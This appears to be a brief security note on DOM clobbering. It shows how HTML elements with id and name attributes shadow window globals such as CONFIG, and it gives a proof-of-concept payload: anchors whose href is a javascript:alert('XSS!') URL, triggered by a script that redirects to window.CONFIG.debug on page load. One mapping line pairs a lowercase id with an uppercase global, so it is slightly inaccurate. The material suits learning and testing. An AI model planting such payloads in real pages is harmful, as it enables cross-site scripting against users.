Dom Clobbering

<a id='CONFIG'> --> window.CONFIG;
<b id='CONFIG' name='debug'> --> window.CONFIG.debug;
<c id='config' name='main'> --> window.CONFIG.main;
<a id='CONFIG'>
<a id='CONFIG' name='debug' href="javascript:alert('XSS!')">

<script>
    window.onload = ()=> {
        location.href = window.CONFIG.debug;
    }
</script>

results matching ""

    No results matching ""